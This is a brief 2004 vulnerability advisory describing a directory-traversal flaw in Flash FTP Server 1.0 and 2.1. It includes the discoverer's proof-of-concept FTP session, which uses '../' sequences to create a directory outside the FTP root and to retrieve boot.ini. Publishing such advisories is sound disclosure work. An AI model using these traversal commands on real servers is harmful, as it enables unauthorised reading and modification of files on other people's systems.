Reported
January 5, 2004 by dr insane.
VERSIONS
AFFECTED
·
Flash FTP
Server 1.0 and 2.1
DESCRIPTION
Flash FTP Server contains a directory-traversal vulnerability. By performing
a simple process (as outlined in the demonstration below), an attacker can read
or modify files and directories that reside anywhere on the vulnerable system.
Creation of a directory outside the bounding FTP root directory:
VENDOR
RESPONSE
CREDIT
Discovered by
dr_insane.
DEMONSTRATION
The discoverer posted the following demonstration as proof of concept:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.
Retrieving of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.iniNET2SOFT has been notified.
Directory Traversal Vulnerability in Flash FTP Server for Windows
0 comments
Hide comments